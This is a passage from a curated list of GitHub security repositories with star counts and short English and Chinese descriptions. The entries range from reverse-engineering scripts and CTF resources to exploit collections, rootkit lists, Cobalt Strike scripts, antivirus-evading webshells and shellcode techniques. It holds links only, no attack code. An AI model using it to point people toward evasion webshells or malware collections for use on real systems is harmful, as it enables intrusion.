[**66**星][2y] [tkmru/awesome-linux-rootkits](https://github.com/tkmru/awesome-linux-rootkits) Awesome Linux Rootkits - [**66**星][10m] [Py] [phxbandit/scripts-and-tools](https://github.com/phxbandit/scripts-and-tools) Scripts and utilities to help your hacking needs - [**66**星][10m] [security-cheatsheet/wireshark-cheatsheet](https://github.com/security-cheatsheet/wireshark-cheatsheet) Wireshark Cheat Sheet - [**65**星][5m] [JS] [exposejs/expose](https://github.com/exposejs/expose) A Dynamic Symbolic Execution (DSE) engine for JavaScript - [**65**星][1y] [Py] [immunit/xip](https://github.com/immunit/xip) XIP generates a list of IP addresses by applying a set of transformations used to bypass security measures e.g. blacklist filtering, WAF, etc. - [**65**星][5m] [Py] [integeruser/on-pwning](https://github.com/integeruser/on-pwning) My solutions to some CTF challenges and a list of interesting resources about pwning stuff - [**65**星][12m] [HTML] [mtesauro/owasp-wte](https://github.com/mtesauro/owasp-wte) Home of the developement for OWASP WTE - the Web Testing Environment, a collection of pre-packaged Linux AppSec tools, apps and documentation used to create pre-configured VMs or installed ala carte in the Linux of your choice.. - [**65**星][1y] [Py] [naivenom/reversing-list](https://github.com/naivenom/reversing-list) Reversing list - [**65**星][2y] [HTML] [secwiki/ipot](https://github.com/secwiki/ipot) 蜜罐技术研究小组 - [**64**星][2y] [opsxcq/proxy-list](https://github.com/opsxcq/proxy-list) A curated list of free public proxy servers - [**64**星][1y] [Lua] [pr4jwal/quick-scripts](https://github.com/pr4jwal/quick-scripts) A collection of my quick and dirty scripts for vulnerability POC and detections - [**64**星][3y] [secdr/sec-ml](https://github.com/secdr/sec-ml) 与安全相关的机器学习资料 - [**63**星][9m] [Shell] [ernw/static-toolbox](https://github.com/ernw/static-toolbox) A collection of statically compiled tools like Nmap and Socat. - [**63**星][3y] [funkmyster/awesome-cloud-security](https://github.com/funkmyster/awesome-cloud-security) Curated list of awesome cloud security blogs, podcasts, standards, projects, and examples. - [**63**星][28d] [tiaotiaolong/sec_interview_know_list](https://github.com/tiaotiaolong/sec_interview_know_list) 信息安全方面面试清单 - [**62**星][9m] [Py] [3lackrush/poc-bank](https://github.com/3lackrush/poc-bank) Focus on cybersecurity | collection of PoC and Exploits - [**62**星][1y] [pfalcon/awesome-linux-android-hacking](https://github.com/pfalcon/awesome-linux-android-hacking) List of hints and Q&As to get most of your Linux/Android device - [**62**星][3y] [shmilylty/sec-box](https://github.com/shmilylty/Sec-Box) information security Tools Box (信息安全工具集合) - [**62**星][30d] [ga1ois/bluehat-2019-seattle](https://github.com/ga1ois/bluehat-2019-seattle) All the materials in BlueHat 2019 Seattle will be realeased here. - [**61**星][2y] [im-bug/blockchain-security-list](https://github.com/im-bug/blockchain-security-list) - [**61**星][3y] [Py] [samyk/awesome-vehicle-security](https://github.com/samyk/awesome-vehicle-security) A curated list of awesome resources, books, hardware, software, applications, people to follow, and more cool stuff about vehicle security, car hacking, and tinkering with the functionality of your car. - [**61**星][7y] [JS] [enablesecurity/webapp-exploit-payloads](https://github.com/EnableSecurity/Webapp-Exploit-Payloads) a collection of payloads for common webapps - [**60**星][2m] [infosec-community/apac-conferences](https://github.com/infosec-community/apac-conferences) A community contributed consolidated list of InfoSec meetups in the Asia Pacific region. - [**60**星][5y] [Go] [jgrahamc/torhoney](https://github.com/jgrahamc/torhoney) Gets the list of TOR exit nodes and matches them with Project Honeypot data - [**60**星][2y] [Shell] [kevthehermit/pentest](https://github.com/kevthehermit/pentest) Just a collection of pentest stuffs - [**59**星][1y] [Roff] [cloudsriseup/hacker_ezines](https://github.com/cloudsriseup/hacker_ezines) A collection of electronic hacker magazines carefully curated over the years from multiple sources - [**59**星][1y] [latestalexey/awesome-web-hacking](https://github.com/latestalexey/awesome-web-hacking) A list of web application security - [**59**星][3m] [lgg/awesome-keepass](https://github.com/lgg/awesome-keepass) Curated list of KeePass-related projects - [**59**星][3m] [Py] [williballenthin/idawilli](https://github.com/williballenthin/idawilli) IDA Pro 资源、脚本和配置文件等 - [hint_calls](https://github.com/williballenthin/idawilli/blob/master/plugins/hint_calls/readme.md) 以Hint的形式战士函数引用的call和字符串 - [dynamic_hints](https://github.com/williballenthin/idawilli/blob/master/plugins/dynamic_hints/readme.md) 演示如何为动态数据提供自定义hint的示例插件 - [add_segment](https://github.com/williballenthin/idawilli/tree/master/scripts/add_segment) 将已存在文件的内容添加为新的segment - [color](https://github.com/williballenthin/idawilli/tree/master/scripts/color) 对指令进行着色 - [find_ptrs](https://github.com/williballenthin/idawilli/tree/master/scripts/find_ptrs) 扫描.text区段查找可能为指针的值,并进行标记 - [yara_fn](https://github.com/williballenthin/idawilli/tree/master/scripts/yara_fn) 创建yara规则,匹配当前函数的basic block - [idawilli](https://github.com/williballenthin/idawilli/tree/master/idawilli) a python module that contains utilities for working with the idapython scripting interface. - [themes](https://github.com/williballenthin/idawilli/tree/master/themes) colors and skins - [**58**星][4y] [C] [dev-zzo/exploits-nt-privesc](https://github.com/dev-zzo/exploits-nt-privesc) Exploit collection for NT privilege escalation - [**58**星][22d] [Py] [lich4/personal_script](https://github.com/lich4/personal_script) 010Editor/BurpSuite/Frida/IDA等多个工具的多个脚本 - [010Editor](https://github.com/lich4/personal_script/tree/master/010Editor_Script) 010Editor的多个脚本 - [ParamChecker](https://github.com/lich4/personal_script/tree/master/BurpSuite_Script) Burp插件 - [Frida](https://github.com/lich4/personal_script/tree/master/Frida_script) Frida多个脚本 - [IDA](https://github.com/lich4/personal_script/tree/master/IDA_Script) IDA Scripts - [IDA-read_unicode.py](https://github.com/lich4/personal_script/blob/master/IDA_Script/read_unicode.py) IDA插件,识别程序中的中文字符 - [IDA-add_xref_for_macho](https://github.com/lich4/personal_script/blob/master/IDA_Script/add_xref_for_macho.py) 辅助识别Objective-C成员函数的caller和callee - [IDA-add_info_for_androidgdb](https://github.com/lich4/personal_script/blob/master/IDA_Script/add_info_for_androidgdb.py) 使用gdbserver和IDA调试Android时,读取module列表和segment - [IDA-trace_instruction](https://github.com/lich4/personal_script/blob/master/IDA_Script/trace_instruction.py) 追踪指令流 - [IDA-detect_ollvm](https://github.com/lich4/personal_script/blob/master/IDA_Script/detect_ollvm.py) 检测OLLVM,在某些情况下修复(Android/iOS) - [IDA-add_block_for_macho](https://github.com/lich4/personal_script/blob/master/IDA_Script/add_block_for_macho.py) 分析macho文件中的block结构 - [**57**星][3m] [PS] [eclypsium/screwed-drivers](https://github.com/eclypsium/screwed-drivers) a centralized source of knowledge which contains a list of drivers determined to be vulnerable as well as example code for how to use this kind of functionality. - [**57**星][2y] [PS] [invokethreatguy/csasc](https://github.com/invokethreatguy/csasc) Cobalt Strike Aggressor Script Collection - [**57**星][2y] [mrash/afl-cve](https://github.com/mrash/afl-cve) A collection of vulnerabilities discovered by the AFL fuzzer (afl-fuzz) - [**57**星][2y] [wangyihang/awesome-web-security](https://github.com/wangyihang/awesome-web-security) Awesome Web Security - [**57**星][3y] [shmilylty/awesome-application-security](https://github.com/shmilylty/awesome-application-security) awesome application security chinese version - [**56**星][2m] [Py] [dedsecinside/awesome-scripts](https://github.com/dedsecinside/awesome-scripts) A collection of awesome scripts from developers around the globe. - [**56**星][13d] [PS] [jaapbrasser/sharedscripts](https://github.com/jaapbrasser/sharedscripts) This is a collection of scripts that I have shared online - [**56**星][2y] [myndtt/ctf-site](https://github.com/myndtt/ctf-site) 介绍一些CTF训练的站点 - [**55**星][26d] [guyanqi/awesome-privacy](https://github.com/guyanqi/awesome-privacy) Repository for collection of research papers on privacy. - [**55**星][10m] [muhammd/awesome-pentest](https://github.com/muhammd/awesome-pentest) Awesome Penetration Testing A collection of awesome penetration testing resources - [**55**星][23d] [C] [outscale/packetgraph](https://github.com/outscale/packetgraph) Packetgraph library is a collection of network bricks you can connect to form a network graph. - [**55**星][2y] [yrzx404/free-security-resources](https://github.com/yrzx404/free-security-resources) 安全总是无处不在... - [**54**星][3y] [annsec/awesome-cybersecurity](https://github.com/annsec/awesome-cybersecurity) Curated list of awesome cybersecurity companies and solutions. - [**54**星][1y] [cujanovic/subdomain-bruteforce-list](https://github.com/cujanovic/subdomain-bruteforce-list) subdomain bruteforce list - [**54**星][4m] [mikerah/awesome-privacy-on-blockchains](https://github.com/mikerah/awesome-privacy-on-blockchains) A curated list of privacy on blockchains resources - [**54**星][2y] [Py] [nezza/scada-stuff](https://github.com/nezza/scada-stuff) A collection of scripts & tools for reverse-engineering & hacking SCADA/ICS devices. - [**54**星][5y] [Py] [nnewsom/webbies](https://github.com/nnewsom/webbies) Collection of tools for web recon and enumeration. - [**54**星][2m] [b-mueller/awesome-mythx-smart-contract-security-tools](https://github.com/b-mueller/awesome-mythx-smart-contract-security-tools) A curated list of resources and tools for the MythX smart contract security API - [**53**星][2y] [1522402210/blockchain-security-list](https://github.com/1522402210/blockchain-security-list) BlockChain-Security-List - [**53**星][2m] [HTML] [brampat/security](https://github.com/brampat/security) Collection of links to Security stuff - [**53**星][2m] [C++] [cirosantilli/algorithm-cheat](https://github.com/cirosantilli/algorithm-cheat) MOVING TO: - [**53**星][6m] [Py] [deadbits/malware-analysis-scripts](https://github.com/deadbits/malware-analysis-scripts) Collection of scripts for different malware analysis tasks - [**53**星][2y] [Py] [h-j-13/malicious_domain_whois](https://github.com/h-j-13/malicious_domain_whois) - [**53**星][3y] [hack-with-github/awesome-hacking-tools](https://github.com/hack-with-github/awesome-hacking-tools) A collection of various hacking and exploitation tools for hackers and pentesters. - [**52**星][2y] [Py] [0xd34db33f/gfyp](https://github.com/0xd34db33f/gfyp) Unification of dnstwist + SQLite + Email reporting. Set it as a cron job that runs every hour, give it a list of domains and email addresses for reporting, then watch it go find stuff. - [**52**星][2y] [harshilpatel007/hackinglabs](https://github.com/harshilpatel007/hackinglabs) A List Of Labs For People (Students) Who Want Learn OR Practice IT Security / Hacking / Penetration Testing In Ethical Way. - [**52**星][6m] [hitripod/awesome-blockchain](https://github.com/hitripod/awesome-blockchain) Curated list of blockchain, Awesome Awesomeness - [**51**星][2y] [JS] [gnijuohz/awesome-developers](https://github.com/gnijuohz/awesome-developers) A list of awesome developers - [**51**星][3m] [jcesarstef/ghhdb-github-hacking-database](https://github.com/jcesarstef/ghhdb-github-hacking-database) Github Hacking Database - My personal collection of Github Dorks to search for Confidential Information (Yes, it's a Github version of Google Dorks) - [**50**星][12d] [Py] [command-tab/awesome-n64-development](https://github.com/command-tab/awesome-n64-development) A curated list of Nintendo 64 development resources including toolchains, documentation, emulators, and more - [**50**星][2y] [PHP] [daudmalik06/reconcat](https://github.com/daudmalik06/reconcat) A small Php application to fetch archive url snapshots from archive.org. using it you can fetch complete list of snapshot urls of any year or complete list of all years possible. Made Specially for penetration testing purpose. - [**50**星][1y] [PS] [dgg-it/match-adhashes](https://github.com/dgg-it/match-adhashes) Builds a hashmap of AD NTLM hashes/usernames and iterates through a second list of hashes checking for the existence of each entry in the AD NTLM hashmap - [**50**星][9m] [Swift] [joncardasis/to-the-apples-core](https://github.com/joncardasis/to-the-apples-core) A collection of non-jailbroken code snippets on reverse-engineered iOS private apis - [**50**星][30d] [PHP] [tsug0d/myawesomewebchallenge](https://github.com/tsug0d/myawesomewebchallenge) Collection of my capture-the-flag web challenge in any levels - [**49**星][3y] [maldevel/rootkits-list-download](https://github.com/maldevel/rootkits-list-download) A curated list of rootkits found on Github and other sites. - [**49**星][1y] [opensourcepentest/tools](https://github.com/opensourcepentest/tools) Tools used for Penetration testing / Red Teaming - [**49**星][2y] [JS] [sola-da/redos-vulnerabilities](https://github.com/sola-da/redos-vulnerabilities) A list of ReDoS vulnerabilities in npm modules found by the Software Lab at TU Darmstadt. For each vulnerability, there is a proof-of-concept exploit, showing how the slowdown may occur. The resources in this repository are provided for research purpose only. Please read below for more details. - [**49**星][6m] [Shell] [t3chnocat/oscp-ctf](https://github.com/t3chnocat/oscp-ctf) oscp-ctf is a small collection of basic Bash scripts that make life easier and save time whether you are in the OSCP labs, HackThebox or playing around with CTFs. - [**48**星][4m] [blackint3/awesome-debugging](https://github.com/blackint3/awesome-debugging) Why Debugging?(为什么要调试?) - [**48**星][1y] [pbnj/infosec-interview-questions](https://github.com/pbnj/infosec-interview-questions) - [**48**星][3m] [C] [spacial/csirt](https://github.com/spacial/csirt) CSIRT is an awesome curated list of links and resources in security and csirt daily activities. - [**47**星][9m] [anhkgg/awesome-windbg-extensions](https://github.com/anhkgg/awesome-windbg-extensions) awesome windbg extensions - [**47**星][5m] [C] [ihack4falafel/osee](https://github.com/ihack4falafel/osee) Collection of things made during my preparation to take on OSEE - [**47**星][5y] [Py] [neohapsis/mptcp-abuse](https://github.com/neohapsis/mptcp-abuse) A collection of tools and resources to explore MPTCP on your network. Initially released at Black Hat USA 2014. - [**47**星][22d] [radareorg/cutter-plugins](https://github.com/radareorg/cutter-plugins) A curated list of Community Plugins and Scripts written for Cutter - [**47**星][9m] [turing-chain/honeypots-on-blockchain](https://github.com/turing-chain/honeypots-on-blockchain) This repo collects almost all the smart contract honeypots that you could find in the first three pages of Google search. - [**47**星][2m] [mohitkhemchandani/oscp_bible](https://github.com/mohitkhemchandani/oscp_bible) This is a collection of resources, scripts, bookmarks, writeups, notes, cheatsheets that will help you in OSCP Preparation as well as for general pentesting and learning. If you feel like you can contribute in it. Please do that, I'll appreciate you. - [**46**星][9m] [syst3ma/awesome-baseband-research](https://github.com/syst3ma/awesome-baseband-research) A curated list of awesome baseband research resources - [**46**星][2y] [gdssecurity/whitepapers](https://github.com/gdssecurity/whitepapers) A collection of publicly released whitepapers - [**46**星][9m] [syst3ma/awesome-baseband-research](https://github.com/syst3ma/awesome-baseband-research) A curated list of awesome baseband research resources - [**45**星][2y] [Pascal] [0x48piraj/malwarex](https://github.com/0x48piraj/malwarex) Collection of killers ! - [**44**星][3y] [shmilylty/nmap-reference-guide](https://github.com/shmilylty/Nmap-Reference-Guide) Nmap Reference Guide(Nmap参考指南) - [**43**星][4m] [TSQL] [abrignoni/dfir-sql-query-repo](https://github.com/abrignoni/dfir-sql-query-repo) Collection of SQL query templates for digital forensics use by platform and application. - [**43**星][1y] [Py] [ambionics/prestashop-exploits](https://github.com/ambionics/prestashop-exploits) Collection of exploits/POC for PrestaShop cookie vulnerabilities (CVE-2018-13784) - [**43**星][1y] [bulentrahimkazanci/windbg-cheat-sheet](https://github.com/bulentrahimkazanci/windbg-cheat-sheet) A practical guide to analyze memory dumps of .Net applications by using Windbg - [**43**星][2y] [C] [rbaron/fitless](https://github.com/rbaron/fitless) A collection of toy firmwares for the ID115 fitness tracker - [**43**星][2y] [Py] [robertbaruch/polychip](https://github.com/robertbaruch/polychip) Python app to extract a netlist of NMOS transistors from an Inkscape diagram. - [**43**星][8m] [C] [sensepost/frida-windows-playground](https://github.com/sensepost/frida-windows-playground) A collection of Frida hooks for experimentation on Windows platforms. - [**43**星][2y] [C] [shipcod3/irc-bot-hunters](https://github.com/shipcod3/irc-bot-hunters) a collection of Metasploit PoC exploits for IRC Botnets that allows RCE - [**43**星][2y] [Shell] [wh1t3rh1n0/pentest-scripts](https://github.com/wh1t3rh1n0/pentest-scripts) Miscellaneous scripts for pentesting - [**42**星][1y] [Py] [daddycocoaman/ironpentest](https://github.com/daddycocoaman/ironpentest) Collection of IronPython scripts and executables for penetration testing - [**42**星][3m] [Py] [dhn/osee](https://github.com/dhn/osee) Collection of resources for my preparation to take the OSEE certification. - [**42**星][2m] [mikalv/awesome-i2p](https://github.com/mikalv/awesome-i2p) A curated list of awesome I2P implementations, libraries, resources, projects, and shiny things. I2P is an anonymous overlay network - a network within a network. It is intended to protect communication from dragnet surveillance and monitoring by third parties such as ISPs. - [**42**星][2y] [C] [nixawk/awesome-windows-debug](https://github.com/nixawk/awesome-windows-debug) Debug Windows Application / Kernel - [**41**星][3y] [C++] [avdbg/saber](https://github.com/avdbg/saber) 《macOS软件安全与逆向分析》随书的调试器代码 - [**41**星][3y] [Assembly] [ilovepp/firminsight](https://github.com/ilovepp/firminsight) Automatic collect firmwares from internet,decompress,find binary code,extract info,file relation and function relation - [**40**星][10m] [54yimeng/sia-websites](https://github.com/54yimeng/sia-websites) 这里是我在youtube等上收集的一些科学上网网站的集合,以各自的网站名命名文件夹。 - [**40**星][2y] [milkdevil/ultimateapplockerbypasslist](https://github.com/milkdevil/ultimateapplockerbypasslist) - [**40**星][2y] [Py] [mxmssh/idametrics](https://github.com/mxmssh/idametrics) 收集x86体系结构的二进制可执行文件的静态软件复杂性度量 - [**39**星][3y] [JS] [auth0-blog/nodejs-awesome-polls](https://github.com/auth0-blog/nodejs-awesome-polls) - [**39**星][4y] [C++] [corelan/pin](https://github.com/corelan/pin) Collection of pin tools - [**39**星][2m] [d1nfinite/sec-interview](https://github.com/d1nfinite/sec-interview) 信息安全面试题汇总 - [**39**星][29d] [Shell] [userlandkernel/plataoplomo](https://github.com/userlandkernel/plataoplomo) Collection of (at time of release) iOS bugs I found - [**38**星][3y] [certtools/intelmq-feeds-documentation](https://github.com/certtools/intelmq-feeds-documentation) Cyber Threat Intelligence Feeds - [**38**星][7y] [Py] [evilcry/pythonscripts](https://github.com/evilcry/pythonscripts) Collection of my Python Scripts - [**38**星][2y] [HTML] [keenrivals/bugsite-index](https://github.com/keenrivals/bugsite-index) Index of websites publishing bugs along the lines of heartbleed.com - [**38**星][1y] [Py] [lnxg33k/misc](https://github.com/lnxg33k/misc) Collection of useful scripts. - [**38**星][1y] [Jupyter Notebook] [nfrumkin/forecast-prometheus](https://github.com/nfrumkin/forecast-prometheus) A collection of analysis, and machine learning techniques for time series forecasting w/ Prometheus metrics - [**38**星][16d] [HTML] [q1271964185/cyberspace_security_learning](https://github.com/q1271964185/cyberspace_security_learning) 在学习CTF、网络安全路上整合自己博客和一些资料,持续更新~ - [**38**星][2y] [Py] [saelo/ida_scripts](https://github.com/saelo/ida_scripts) 多脚本 - [kernelcache](https://github.com/saelo/ida_scripts/blob/master/kernelcache.py) 识别并重命名iOS kernelcache函数stub。ARM64 Only - [ssdt](https://github.com/saelo/ida_scripts/blob/master/ssdt.py) 解析Windows内核中的syscall表 - [**38**星][1y] [Py] [tanc7/arms-commander](https://github.com/tanc7/arms-commander) Malware Suite/Menu designed for "Speedy and No-Mistakes Penetration Testing", written in Python 2.7.13 and tested on Kali Linux 4.6 & 4.9, originally intended to only perform the Reconnaissance and Enumeration Stages (it's role is dramatically expanded now). Requires Python 2.7 + Pip + Termcolor Module. All code is entirely free to be used in yo… - [**38**星][3y] [wtsxdev/exploit-development](https://github.com/wtsxdev/exploit-development) Resources for learning about Exploit Development - [**37**星][2m] [Py] [michaelstott/crlf-injection-scanner](https://github.com/michaelstott/crlf-injection-scanner) Command line tool for testing CRLF injection on list of domains. - [**37**星][2y] [C] [mlafeldt/ps2rd](https://github.com/mlafeldt/ps2rd) Collection of tools to remotely debug PS2 games - [**37**星][2m] [Lua] [r00t-3xp10it/nmap-nse-modules](https://github.com/r00t-3xp10it/nmap-nse-modules) My collection of nmap nse modules - [**37**星][3y] [vduddu/pentestresources](https://github.com/vduddu/pentestresources) A list of resources for Pentesting from various sources - [**37**星][2y] [rivaill/blockchain-security-awesome](https://github.com/Rivaill/blockchain-security-awesome) A curated list of awesome things related to blockchain security - [**36**星][17d] [Perl] [gouveaheitor/security-spellbook](https://github.com/gouveaheitor/security-spellbook) My collection of custom scripts, plugins, exploits and others small things - [**36**星][10m] [Py] [phage-nz/malware-hunting](https://github.com/phage-nz/malware-hunting) 与 Malware Hunting 相关的脚本/信息收集 - [**36**星][1y] [JS] [threatexpress/aggressor-scripts](https://github.com/threatexpress/aggressor-scripts) Cobalt Strike Aggressor Scripts - [**35**星][3y] [Shell] [diekmann/net-network](https://github.com/diekmann/net-network) Public collection of firewall dumps. - [**35**星][5y] [Py] [kitctf/ctfcode](https://github.com/kitctf/ctfcode) Collection of somewhat useful stuff for CTF events - [**35**星][7m] [Shell] [kitsun3sec/pentest-cheat-sheets](https://github.com/kitsun3sec/pentest-cheat-sheets) A collection of snippets of codes and commands to make your life easier! - [**35**星][16d] [C] [atrosinenko/kbdysch](https://github.com/atrosinenko/kbdysch) A collection of user-space Linux kernel specific guided fuzzers based on LKL - [**34**星][2m] [HTML] [adulau/misp-osint-collection](https://github.com/adulau/misp-osint-collection) Collection of best practices to add OSINT into MISP and/or MISP communities - [**34**星][2y] [Py] [anbai-inc/secrss](https://github.com/anbai-inc/secrss) RSS安全订阅 每日安全信息推送 - [**34**星][4y] [Py] [madsc13ntist/idapython](https://github.com/madsc13ntist/idapython) IDAPython脚本收集(无文档) - [**33**星][3y] [cert-w/hadoop-attack-library](https://github.com/cert-w/hadoop-attack-library) A collection of pentest tools and resources targeting Hadoop environments - [**33**星][4y] [HTML] [gosecure/security-cheat-sheet](https://github.com/gosecure/security-cheat-sheet) Minimalist cheat sheet for developpers to write secure code - [**33**星][10m] [kiyadesu/android-reversing-challenges](https://github.com/kiyadesu/android-reversing-challenges) there are some CTF challenges or some other things helping improving android reversing skills. - [**33**星][10m] [kiyadesu/android-reversing-challenges](https://github.com/kiyadesu/android-reversing-challenges) there are some CTF challenges or some other things helping improving android reversing skills. - [**33**星][16d] [Py] [angr/angr-platforms](https://github.com/angr/angr-platforms) A collection of extensions to angr to handle new platforms - [**33**星][2m] [Py] [landgrey/toolsparty](https://github.com/landgrey/toolsparty) A collection of script tools for pentesting - [**32**星][1y] [lylemi/dom-vuln-db](https://github.com/lylemi/dom-vuln-db) A collection of Browser DOM Vulnerabilities with PoCs - [**32**星][3y] [nextco/android-decompiler](https://github.com/nextco/android-decompiler) A hight quality list of tools to reverse engineering code from android. - [**32**星][19d] [Java] [retarded-skid/skidsuite-3](https://github.com/retarded-skid/skidsuite-3) A collection of java reverse engineering tools and informational links - [**32**星][6y] [PS] [roo7break/powershell-scripts](https://github.com/roo7break/powershell-scripts) List of PowerShell scripts conjured up for my consumption (you are welcome to use) - [**31**星][10m] [JS] [codebox/monkeyshine](https://github.com/codebox/monkeyshine) A collection of slightly evil JavaScript - [**31**星][5m] [C] [csandker/inmemoryshellcode](https://github.com/csandker/inmemoryshellcode) A Collection of In-Memory Shellcode Execution Techniques for Windows - [**31**星][4y] [danielmiessler/ctfsolutiontypes](https://github.com/danielmiessler/ctfsolutiontypes) A collection of CTF solution types, i.e. not solutions to specific CTF challenges, but the general categories that those solutions fall under. Includes CTF solution categories for web, binary, network, crypto, and others. Please contribute! - [**31**星][10m] [mmarfil/tinfoilhat](https://github.com/mmarfil/tinfoilhat) A list of privacy-respecting alternatives to apps and services that track you around. - [**31**星][6y] [Ruby] [zeknox/scripts](https://github.com/zeknox/scripts) a collection of useful scripts that for penetration testers - [**31**星][2m] [zoranpandovski/awesome-testing-tools](https://github.com/zoranpandovski/awesome-testing-tools) - [**30**星][2y] [biprodeep/awesome-ml-for-cybersecurity](https://github.com/biprodeep/awesome-ml-for-cybersecurity) - [**30**星][3y] [Py] [deadbits/shells](https://github.com/deadbits/shells) collection of useful shells for penetration tests - [**30**星][5m] [PS] [kendalvandyke/sqlpowerdoc](https://github.com/kendalvandyke/sqlpowerdoc) SQL Power Doc is a collection of Windows PowerShell scripts and modules that discover, document, and diagnose SQL Server instances and their underlying Windows OS & machine configurations. - [**30**星][1y] [Tcl] [mohemiv/tcltools](https://github.com/mohemiv/tcltools) Сollection of TCL scripts for Cisco IOS penetration testing - [**30**星][4y] [neu5ron/malware-traffic-analysis-pcaps](https://github.com/neu5ron/malware-traffic-analysis-pcaps) 网站malware-traffic-analysis.net的pcap文件托管 - [**29**星][2y] [syst3ma/awesome_cisco_exploitation](https://github.com/syst3ma/awesome_cisco_exploitation) A curated list of awesome Cisco exploitation resources - [**29**星][2y] [Lua] [foxmole/pwnadventure3](https://github.com/foxmole/pwnadventure3) Blog series about Pwn Adventure 3 - [**29**星][3y] [Py] [scubsrgroup/lectures-a-weekly-information-security-knowledge-lecture-hall](https://github.com/scubsrgroup/lectures-a-weekly-information-security-knowledge-lecture-hall) “每周一讲,信息安全基础知识讲堂”由四川大学信息安全研究所漏洞挖掘和利用组同学共同创建,通过每组员每周一讲的形式展开,主要涉及信息安全的基础知识,包括windows安全、移动安全等,此外还对通过该平台对外发布一些小组的研究成果!通过知识讲座一方面对新同学起到引导作用,另一方面则是漏洞挖掘与利用研究组同学信息安全研究经验和知识的积累! - [**29**星][2m] [hrt/anticheatjs](https://github.com/hrt/anticheatjs) Javascript Anti Cheats 101 - [**29**星][3m] [C] [iaik/transientfail](https://github.com/iaik/transientfail) Website and PoC collection for transient execution attacks - [**29**星][2y] [syst3ma/awesome_cisco_exploitation](https://github.com/syst3ma/awesome_cisco_exploitation) A curated list of awesome Cisco exploitation resources - [**28**星][6y] [Ruby] [andrewsmhay/brisket](https://github.com/andrewsmhay/brisket) Brisket is a collection of frontend scripts for masscan, zmap, and nmap, in addition data manipulation scripts - [**28**星][1y] [C] [mrmacete/r2scripts](https://github.com/mrmacete/r2scripts) Collection of scripts for radare2 - [**28**星][6y] [Shell] [packetforger/localroot](https://github.com/packetforger/localroot) Collection of tools for privesc on Linux - [**28**星][3y] [Shell] [rccoder/awesome-shadowsocks-qt5-installation-on-debian](https://github.com/rccoder/awesome-shadowsocks-qt5-installation-on-debian) Installation Script For shadowsocks-Qt5 on Debian - [**28**星][2y] [secarmalabs/iotchecklist](https://github.com/secarmalabs/iotchecklist) Baseline IoT security checklist. Consider security as early in development as possible and reap the rewards. - [**28**星][2y] [HTML] [shikarisenpai/leak-ntlm-hash-via-html](https://github.com/shikarisenpai/leak-ntlm-hash-via-html) List of HTML tags for leaking NTLM-hashes - [**28**星][2m] [JS] [benoitsevens/applying-ttd-to-malware-analysis](https://github.com/benoitsevens/applying-ttd-to-malware-analysis) Resources for the workshop titled "Repacking the unpacker: Applying Time Travel Debugging to malware analysis", given at HackLu 2019 - [**27**星][1y] [alonemonkey/iosrebook-issues](https://github.com/alonemonkey/iosrebook-issues) 《iOS应用逆向与安全》 勘误 - [**27**星][2y] [PHP] [blackfan/web-inf-dict](https://github.com/blackfan/web-inf-dict) List of configuration files from WEB-INF and META-INF for use in Unvalidated Forwards and JSP Include vulnerabilities. - [**27**星][9m] [Py] [nullarray/amplispy](https://github.com/nullarray/amplispy) Check local or remote list of DNS servers for suitability in DNS Amplification DoS. - [**27**星][3y] [stayliv3/iotsec](https://github.com/stayliv3/iotsec) 收集物联网安全相关资料 - [**27**星][23d] [security-prince/resources-for-application-security](https://github.com/security-prince/resources-for-application-security) Some good resources for getting started with application security - [**26**星][2m] [infosec-community/apac-meetups](https://github.com/infosec-community/apac-meetups) A community contributed consolidated list of InfoSec meetups in the Asia Pacific region. - [**26**星][2y] [Shell] [jchrisfarris/aws-service-control-policies](https://github.com/jchrisfarris/aws-service-control-policies) Collection of semi-useful Service Control Policies and scripts to manage them - [**26**星][3y] [lucifer1993/awesome-hacking](https://github.com/lucifer1993/awesome-hacking) awesome hacking chinese version - [**26**星][1m] [meitar/awesome-pentest](https://github.com/meitar/awesome-pentest) - [**26**星][5m] [pushinginertia/ip-blacklist](https://github.com/pushinginertia/ip-blacklist) An Apache httpd configuration file that rejects access to a server from a list of blacklisted IPs - [**26**星][20d] [thehive-project/awesome](https://github.com/thehive-project/awesome) A curated list of awesome things related to TheHive & Cortex - [**25**星][1y] [Go] [opennota/hydra](https://github.com/opennota/hydra) Penetration testing tool. This repository has migrated to - [**25**星][3y] [unexpectedby/awesome-pentest-tools](https://github.com/unexpectedby/awesome-pentest-tools) List of Security Archives Tools and software, generally for facilitate security & penetration research. Opening it up to everyone will facilitate a knowledge transfer. Hopefully the initial set will grow and expand. - [**25**星][5y] [wirelesscollege/securitytools](https://github.com/wirelesscollege/securitytools) android安全工具大全 - [**25**星][3y] [wtsxdev/application-security](https://github.com/wtsxdev/application-security) Resources for learning about application security - [**24**星][1y] [bountymachine/about](https://github.com/bountymachine/about) A central place to keep track of relevant BountyMachine talks, blogs, and interesting things! - [**24**星][2y] [evilmog/hashcat-hcstat](https://github.com/evilmog/hashcat-hcstat) A collection of hashcat-hcstat files - [**24**星][3m] [jmscory/security-tool-chest](https://github.com/jmscory/security-tool-chest) A list of useful security and obvescation tools useful for red and blue teaming activities. A list made possible by the provided references. - [**24**星][6m] [meitar/awesome-malware](https://github.com/meitar/awesome-malware) - [**24**星][6m] [redshiftzero/awesome-threat-modeling](https://github.com/redshiftzero/awesome-threat-modeling) a curated list of useful threat modeling resources - [**23**星][3y] [PHP] [3xp10it/xwebshell](https://github.com/3xp10it/xwebshell) 免杀webshell集合 - [**23**星][3y] [johnnydep/cobaltstrike](https://github.com/johnnydep/cobaltstrike) cobalt strike stuff I have gathered from around github - [**23**星][29d] [Shell] [meisterp/torbrowser-overlay](https://github.com/meisterp/torbrowser-overlay) Gentoo overlay for Tor Browser related ebuilds - [**23**星][2y] [Py] [simonuvarov/expdev](https://github.com/simonuvarov/expdev) - [**23**星][6m] [HTML] [tarafans/collections](https://github.com/tarafans/collections) A medley of PoCs and exploits - [**23**星][2m] [Py] [torpyorg/torpy](https://github.com/torpyorg/torpy) Pure python Tor client implementation of the Tor protocol - [**22**星][4y] [Java] [ernw/burpsuite-extensions](https://github.com/ernw/burpsuite-extensions) A collection of Burp Suite extensions - [**22**星][3y] [PHP] [gr33ntii/malware-collection](https://github.com/gr33ntii/malware-collection) - [**22**星][2y] [JS] [jamesacampbell/elector](https://github.com/jamesacampbell/elector) TOR BROWSER IN ELECTRON - [**22**星][4m] [Py] [nlitsme/idascripts](https://github.com/nlitsme/idascripts) 枚举多种类型数据:Texts/NonFuncs/... - [enumerators](https://github.com/nlitsme/idascripts/blob/master/enumerators.py) Enumeration utilities for idapython - [**22**星][4y] [Py] [onethawt/idapyscripts](https://github.com/onethawt/idapyscripts) IDAPython脚本 - 